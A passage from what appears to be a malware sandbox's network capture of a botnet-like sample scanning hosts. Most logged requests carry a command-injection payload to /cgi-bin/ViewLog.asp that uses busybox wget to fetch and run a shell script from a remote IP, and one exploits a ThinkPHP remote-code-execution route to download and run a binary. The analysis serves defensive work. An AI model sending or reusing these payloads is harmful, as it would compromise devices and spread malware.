20 74 69 74 6c 65 20 61 72 65 61 20 2a 2f 0a 23 74 69 74 6c 65 73 20 7b 0a 09 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 20 31 35 70 78 3b 0a 09 70 61 64 64 69 6e 67 3a 20 31 30 70 78 3b 0a 09 70 61 64 64 69 6e 67 2d 6c 65 66 74 3a 20 31 30 30 70 78 3b 0a 09 62 61 63 6b 67 72 6f 75 6e 64 3a 20 75 72 6c 28 27 68 74 74 70 3a 2f 2f 77 77 77 2e 73 71 75 69 64 2d 63 61 63 68 65 2e 6f 72 67 2f 41 72 74 77 6f 72 6b 2f 53 4e 2e 70 6e 67 27 29 20 6e 6f 2d 72 65 70 65 61 74 20 6c 65 66 74 3b 0a 7d 0a 0a 2f 2a 20 69 6e 69 74 69 61 6c 20 74 69 74 6c 65 20 2a 2f 0a 23 74 69 74 6c 65 73 20 68 31 20 7b 0a 09 63 6f 6c 6f 72 3a 20 23 30 30 30 30 30 30 3b 0a 7d 0a 23 74 69 74 6c 65 73 20 68 32 20 7b 0a 09 63 6f 6c 6f 72 3a 20 23 30 30 30 30 30 30 3b 0a 7d 0a 0a 2f 2a 20 73 70 65 63 69 61 6c 20 65 76 65 6e 74 3a 20 46 54 50 20 73 75 63 63 65 73 73 20 70 61 67 65 20 74 69 74 6c 65 73 20 2a 2f 0a 23 74 69 74 6c 65 73 20 66 74 70 73 75 63 63 65 73 73 20 7b 0a 09 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 30 30 66 66 30 30 3b 0a 09 77 69 64 74 68 3a 31 30 30 25 3b 0a 7d 0a 0a 2f 2a 20 50 61 67 65 20 64 69 73 70 6c 61 79 65 64 20 62 6f 64 79 20 63 6f 6e 74 65 6e 74 20 61 72 65 61 20 2a 2f 0a 23 63 6f 6e 74 65 6e 74 20 7b 0a 09 70 61 64 64 69 6e 67 3a 20 31 30 70 78 3b 0a 09 62 61 63 6b 67 72 6f 75 6e 64 3a 20 23 66 66 66 66 66 66 3b 0a 7d 0a
                                                        Data Ascii: <!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd"> <html><head> <meta http-equiv="Content-Type" content="text/html; charset=utf-8"> <title>ERROR: The requested URL could not be retrieved</title> <style type="text/css">... /* Stylesheet for Squid Error pages Adapted from design by Free CSS Templates http://www.freecsstemplates.org Released for free under a Creative Commons Attribution 2.5 License*//* Page basics */* {font-family: verdana, sans-serif;}html body {margin: 0;padding: 0;background: #efefef;font-size: 12px;color: #1e1e1e;}/* Page displayed title area */#titles {margin-left: 15px;padding: 10px;padding-left: 100px;background: url('http://www.squid-cache.org/Artwork/SN.png') no-repeat left;}/* initial title */#titles h1 {color: #000000;}#titles h2 {color: #000000;}/* special event: FTP success page titles */#titles ftpsuccess {background-color:#00ff00;width:100%;}/* Page displayed body content area */#content {padding: 10px;background: #ffffff;}


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        582192.168.2.233567031.10.35.2548080
                                                        TimestampBytes transferredDirectionData
                                                        Apr 14, 2024 16:36:26.357614994 CEST314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 39 34 2e 36 32 2e 32 34 38 2e 31 30 33 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://194.62.248.103/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh
                                                        Apr 14, 2024 16:36:26.659037113 CEST711INHTTP/1.0 404 Not Found !!!
                                                        Cache-Control: no-cache, no-store, must-revalidate
                                                        Pragma: no-cache
                                                        Content-type: text/html
                                                        <html> <head> <title>404 Not Found !!!</title> </head><body><div align="center"><center><table border="1" cellspacing="0" width="100%"> <tr> <td width="100%" bgcolor="#0000A0"> <p align="center"><font color="#FFFFFF" face="Arial"> <strong>404 Not Found !!!</strong></font></td> </tr> <tr> <td width="100%" bgcolor="#F3F3F3" bordercolor="#000080" bordercolordark="#000080"> <p align="center"><font face="Times New Romain" color="#000000"> <strong>The requested URL was not found on this server.</strong></font></td> </tr></table></body></html>
                                                        Data Raw:
                                                        Data Ascii:


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        583192.168.2.235148462.171.130.338080
                                                        TimestampBytes transferredDirectionData
                                                        Apr 14, 2024 16:36:26.357630014 CEST326OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 39 34 2e 36 32 2e 32 34 38 2e 31 30 33 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://194.62.248.103/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        584192.168.2.235110894.120.109.1628080
                                                        TimestampBytes transferredDirectionData
                                                        Apr 14, 2024 16:36:26.390363932 CEST314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 39 34 2e 36 32 2e 32 34 38 2e 31 30 33 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://194.62.248.103/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        585192.168.2.235584494.131.52.1708080
                                                        TimestampBytes transferredDirectionData
                                                        Apr 14, 2024 16:36:26.932512999 CEST326OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 39 34 2e 36 32 2e 32 34 38 2e 31 30 33 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://194.62.248.103/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh
                                                        Apr 14, 2024 16:36:27.213993073 CEST1260INHTTP/1.1 400 Bad Request
                                                        Server: squid/4.10
                                                        Mime-Version: 1.0
                                                        Date: Sun, 14 Apr 2024 14:36:27 GMT
                                                        Content-Type: text/html;charset=utf-8
                                                        Content-Length: 3543
                                                        X-Squid-Error: ERR_INVALID_URL 0
                                                        Vary: Accept-Language
                                                        Content-Language: en
                                                        X-Cache: MISS from localhost
                                                        X-Cache-Lookup: NONE from localhost:8080
                                                        Via: 1.1 localhost (squid/4.10)
                                                        Connection: close
                                                        Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 48 54 4d 4c 20 34 2e 30 31 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 68 74 6d 6c 34 2f 73 74 72 69 63 74 2e 64 74 64 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 74 79 70 65 3d 22 63 6f 70 79 72 69 67 68 74 22 20 63 6f 6e 74 65 6e 74 3d 22 43 6f 70 79 72 69 67 68 74 20 28 43 29 20 31 39 39 36 2d 32 30 31 39 20 54 68 65 20 53 71 75 69 64 20 53 6f 66 74 77 61 72 65 20 46 6f 75 6e 64 61 74 69 6f 6e 20 61 6e 64 20 63 6f 6e 74 72 69 62 75 74 6f 72 73 22 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 3c 74 69 74 6c 65 3e 45 52 52 4f 52 3a 20 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 63 6f 75 6c 64 20 6e 6f 74 20 62 65 20 72 65 74 72 69 65 76 65 64 3c 2f 74 69 74 6c 65 3e 0a 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 3c 21 2d 2d 20 0a 20 2f 2a 0a 20 2a 20 43 6f 70 79 72 69 67 68 74 20 28 43 29 20 31 39 39 36 2d 32 30 32 30 20 54 68 65 20 53 71 75 69 64 20 53 6f 66 74 77 61 72 65 20 46 6f 75 6e 64 61 74 69 6f 6e 20 61 6e 64 20 63 6f 6e 74 72 69 62 75 74 6f 72 73 0a 20 2a 0a 20 2a 20 53 71 75 69 64 20 73 6f 66 74 77 61 72 65 20 69 73 20 64 69 73 74 72 69 62 75 74 65 64 20 75 6e 64 65 72 20 47 50 4c 76 32 2b 20 6c 69 63 65 6e 73 65 20 61 6e 64 20 69 6e 63 6c 75 64 65 73 0a 20 2a 20 63 6f 6e 74 72 69 62 75 74 69 6f 6e 73 20 66 72 6f 6d 20 6e 75 6d 65 72 6f 75 73 20 69 6e 64 69 76 69 64 75 61 6c 73 20 61 6e 64 20 6f 72 67 61 6e 69 7a 61 74 69 6f 6e 73 2e 0a 20 2a 20 50 6c 65 61 73 65 20 73 65 65 20 74 68 65 20 43 4f 50 59 49 4e 47 20 61 6e 64 20 43 4f 4e 54 52 49 42 55 54 4f 52 53 20 66 69 6c 65 73 20 66 6f 72 20 64 65 74 61 69 6c 73 2e 0a 20 2a 2f 0a 0a 2f 2a 0a 20 53 74 79 6c 65 73 68 65 65 74 20 66 6f 72 20 53 71 75 69 64 20 45 72 72 6f 72 20 70 61 67 65 73 0a 20 41 64 61 70 74 65 64 20 66 72 6f 6d 20 64 65 73 69 67 6e 20 62 79 20 46 72 65 65 20 43 53 53 20 54 65 6d 70 6c 61 74 65 73 0a 20 68 74 74 70 3a 2f 2f 77 77 77 2e 66 72 65 65 63 73 73 74 65 6d 70 6c 61 74 65 73 2e 6f 72 67 0a 20 52 65 6c 65 61 73 65 64 20 66 6f 72 20 66 72 65 65 20 75 6e 64 65 72 20 61 20 43 72 65 61 74 69 76 65 20 43 6f 6d 6d 6f 6e 73 20 41 74 74 72 69 62 75 74 69 6f 6e 20 32 2e 35 20 4c 69 63 65 6e 73 65 0a 2a 2f 0a 0a 2f 2a 20 50 61 67 65 20 62 61 73 69 63 73 20 2a 2f 0a 2a 20 7b 0a 09 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 76 65 72 64 61 6e 61 2c 20 73 61 6e 73
                                                        Data Ascii: <!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd"><html><head><meta type="copyright" content="Copyright (C) 1996-2019 The Squid Software Foundation and contributors"><meta http-equiv="Content-Type" content="text/html; charset=utf-8"><title>ERROR: The requested URL could not be retrieved</title><style type="text/css">... /* * Copyright (C) 1996-2020 The Squid Software Foundation and contributors * * Squid software is distributed under GPLv2+ license and includes * contributions from numerous individuals and organizations. * Please see the COPYING and CONTRIBUTORS files for details. *//* Stylesheet for Squid Error pages Adapted from design by Free CSS Templates http://www.freecsstemplates.org Released for free under a Creative Commons Attribution 2.5 License*//* Page basics */* {font-family: verdana, sans


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        586192.168.2.235044485.122.205.668080
                                                        TimestampBytes transferredDirectionData
                                                        Apr 14, 2024 16:36:27.025937080 CEST326OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 39 34 2e 36 32 2e 32 34 38 2e 31 30 33 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://194.62.248.103/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        587192.168.2.233732031.200.101.1208080
                                                        TimestampBytes transferredDirectionData
                                                        Apr 14, 2024 16:36:27.058145046 CEST314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 39 34 2e 36 32 2e 32 34 38 2e 31 30 33 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://194.62.248.103/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        588192.168.2.233556494.121.124.108080
                                                        TimestampBytes transferredDirectionData
                                                        Apr 14, 2024 16:36:27.062952042 CEST314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 39 34 2e 36 32 2e 32 34 38 2e 31 30 33 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://194.62.248.103/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        589192.168.2.234176831.200.35.2498080
                                                        TimestampBytes transferredDirectionData
                                                        Apr 14, 2024 16:36:27.366420031 CEST314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 39 34 2e 36 32 2e 32 34 38 2e 31 30 33 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://194.62.248.103/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        590192.168.2.235315431.200.125.88080
                                                        TimestampBytes transferredDirectionData
                                                        Apr 14, 2024 16:36:27.366491079 CEST314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 39 34 2e 36 32 2e 32 34 38 2e 31 30 33 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://194.62.248.103/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        591192.168.2.235774494.120.56.2078080
                                                        TimestampBytes transferredDirectionData
                                                        Apr 14, 2024 16:36:27.368310928 CEST314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 39 34 2e 36 32 2e 32 34 38 2e 31 30 33 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://194.62.248.103/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        592192.168.2.235788695.161.233.148080
                                                        TimestampBytes transferredDirectionData
                                                        Apr 14, 2024 16:36:29.078205109 CEST314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 39 34 2e 36 32 2e 32 34 38 2e 31 30 33 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://194.62.248.103/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        593192.168.2.235856894.121.64.598080
                                                        TimestampBytes transferredDirectionData
                                                        Apr 14, 2024 16:36:29.087886095 CEST314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 39 34 2e 36 32 2e 32 34 38 2e 31 30 33 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://194.62.248.103/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        594192.168.2.234603294.16.110.2008080
                                                        TimestampBytes transferredDirectionData
                                                        Apr 14, 2024 16:36:29.381501913 CEST326OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 39 34 2e 36 32 2e 32 34 38 2e 31 30 33 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://194.62.248.103/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh
                                                        Apr 14, 2024 16:36:29.681494951 CEST320INHTTP/1.1 404 Not Found
                                                        Server: nginx/1.23.3
                                                        Date: Sun, 14 Apr 2024 14:36:29 GMT
                                                        Content-Type: text/html
                                                        Content-Length: 153
                                                        Connection: keep-alive
                                                        Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 32 33 2e 33 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                        Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx/1.23.3</center></body></html>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        595192.168.2.234150462.176.122.2108080
                                                        TimestampBytes transferredDirectionData
                                                        Apr 14, 2024 16:36:29.411410093 CEST326OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 39 34 2e 36 32 2e 32 34 38 2e 31 30 33 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://194.62.248.103/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        596192.168.2.233907888.221.79.14680
                                                        TimestampBytes transferredDirectionData
                                                        Apr 14, 2024 16:36:29.908879995 CEST333OUTGET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://194.62.248.103/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: /
                                                        User-Agent: Uirusu/2.0
                                                        Apr 14, 2024 16:36:30.214716911 CEST583INHTTP/1.0 400 Bad Request
                                                        Server: AkamaiGHost
                                                        Mime-Version: 1.0
                                                        Content-Type: text/html
                                                        Content-Length: 361
                                                        Expires: Sun, 14 Apr 2024 14:36:30 GMT
                                                        Date: Sun, 14 Apr 2024 14:36:30 GMT
                                                        Connection: close
                                                        Data Raw: 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 0a 3c 54 49 54 4c 45 3e 49 6e 76 61 6c 69 64 20 55 52 4c 3c 2f 54 49 54 4c 45 3e 0a 3c 2f 48 45 41 44 3e 3c 42 4f 44 59 3e 0a 3c 48 31 3e 49 6e 76 61 6c 69 64 20 55 52 4c 3c 2f 48 31 3e 0a 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 22 68 74 74 70 26 23 35 38 3b 26 23 34 37 3b 26 23 34 37 3b 26 23 33 37 3b 35 62 4e 6f 26 23 33 37 3b 32 30 48 6f 73 74 26 23 33 37 3b 35 64 26 23 34 37 3b 69 6e 64 65 78 26 23 34 36 3b 70 68 70 26 23 36 33 3b 22 2c 20 69 73 20 69 6e 76 61 6c 69 64 2e 3c 70 3e 0a 52 65 66 65 72 65 6e 63 65 26 23 33 32 3b 26 23 33 35 3b 39 26 23 34 36 3b 63 64 65 36 36 35 35 66 26 23 34 36 3b 31 37 31 33 31 30 35 33 39 30 26 23 34 36 3b 32 30 33 64 32 66 35 31 0a 3c 50 3e 68 74 74 70 73 26 23 35 38 3b 26 23 34 37 3b 26 23 34 37 3b 65 72 72 6f 72 73 26 23 34 36 3b 65 64 67 65 73 75 69 74 65 26 23 34 36 3b 6e 65 74 26 23 34 37 3b 39 26 23 34 36 3b 63 64 65 36 36 35 35 66 26 23 34 36 3b 31 37 31 33 31 30 35 33 39 30 26 23 34 36 3b 32 30 33 64 32 66 35 31 3c 2f 50 3e 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0a
                                                        Data Ascii: <HTML><HEAD><TITLE>Invalid URL</TITLE></HEAD><BODY><H1>Invalid URL</H1>The requested URL "http&#58;&#47;&#47;&#37;5bNo&#37;20Host&#37;5d&#47;index&#46;php&#63;", is invalid.<p>Reference&#32;&#35;9&#46;cde6655f&#46;1713105390&#46;203d2f51<P>https&#58;&#47;&#47;errors&#46;edgesuite&#46;net&#47;9&#46;cde6655f&#46;1713105390&#46;203d2f51</P></BODY></HTML>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        597192.168.2.234821085.241.131.988080
                                                        TimestampBytes transferredDirectionData
                                                        Apr 14, 2024 16:36:30.069657087 CEST326OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 39 34 2e 36 32 2e 32 34 38 2e 31 30 33 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://194.62.248.103/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        598192.168.2.235472095.217.180.238080
                                                        TimestampBytes transferredDirectionData
                                                        Apr 14, 2024 16:36:30.070589066 CEST326OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 39 34 2e 36 32 2e 32 34 38 2e 31 30 33 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://194.62.248.103/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh
                                                        Apr 14, 2024 16:36:30.387839079 CEST144INHTTP/1.1 404 Not Found
                                                        Server: Apache/2.4.6 (CentOS)
                                                        Date: Sun, 14 Apr 2024 14:36:30 GMT
                                                        Content-Length: 0
                                                        Connection: close


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        599192.168.2.234071695.108.13.2338080
                                                        TimestampBytes transferredDirectionData
                                                        Apr 14, 2024 16:36:30.083343983 CEST326OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
